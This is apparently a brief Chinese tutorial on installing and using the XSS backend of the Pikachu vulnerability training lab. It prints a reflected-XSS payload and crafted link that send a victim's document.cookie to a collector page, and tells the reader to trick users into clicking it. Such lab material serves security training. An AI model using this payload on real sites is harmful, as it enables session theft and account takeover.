pikachu XSS后台的使用和安装
xss后台的安装
重定向到另一个可信网址 让点击者 不知情
1.cookie值获取
查看源代码
在反射型xss(get)页面下使用
<script> document.location = ‘http://192.168.50.100/pkxss/xcookie/cookie.php?cookie=‘ + document.cookie; </script>
点提交,会跳转到首页,
http://192.168.50.100/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E+document.location+%3D+%27http%3A%2F%2F192.168.50.100%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+++%2B++document.cookie%3B+%3C%2Fscript%3E&submit=submit
欺骗用户去点击
就会出现第二个
反射型xss(get)
让用户去点击这个页面 获取cookie值
2.钓鱼结果
3.键盘记录
相关推荐
sswqycbailong 2020-07-28
csxiaoqiang 2020-07-26
码农成长记 2020-07-19
layloge 2020-07-05
layloge 2020-06-26
liangjielaoshi 2020-06-25
csxiaoqiang 2020-06-16
某先生 2020-06-13
ItBJLan 2020-06-11
layloge 2020-06-07
csxiaoqiang 2020-06-03
sswqycbailong 2020-06-01
layloge 2020-05-30
码农成长记 2020-05-28
qidu 2020-05-26
zhuangnet 2020-05-20
zhuangnet 2020-05-19
xiaoemo0 2020-05-16
码农成长记 2020-05-10